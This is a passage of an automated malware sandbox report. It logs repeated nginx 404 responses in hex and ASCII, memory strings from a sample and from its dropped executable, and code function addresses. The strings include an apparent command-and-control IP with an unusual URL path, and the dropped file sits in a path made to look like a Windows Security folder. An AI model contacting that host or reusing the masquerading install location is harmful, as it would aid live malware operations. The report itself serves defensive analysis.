4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:12:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 20:13:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1969052018.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000017.00000002.2035236957.0000000003117000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2143640627.0000000003497000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2252468797.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2364133996.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000002B.00000002.2436835588.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2506859121.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2615271369.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2683215175.0000000002817000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.188.197.24
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti
Source: OH6KO8NBy1.exe, 00000000.00000002.1677336320.0000000003227000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1969052018.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000017.00000002.2035236957.0000000003117000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2143640627.0000000003497000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2252468797.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2364133996.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000002B.00000002.2436835588.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2506859121.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2615271369.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2683215175.0000000002817000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Code function: 0_2_00007FFD9BAB0D70	0_2_00007FFD9BAB0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BAFA4C7	5_2_00007FFD9BAFA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0A389	5_2_00007FFD9BB0A389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BAB0D70	5_2_00007FFD9BAB0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BABF7CA	5_2_00007FFD9BABF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BACD7B6	5_2_00007FFD9BACD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BACBD2D	5_2_00007FFD9BACBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 11_2_00007FFD9BAC0D70	11_2_00007FFD9BAC0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BACF7CA	18_2_00007FFD9BACF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BADD7B6	18_2_00007FFD9BADD7B6
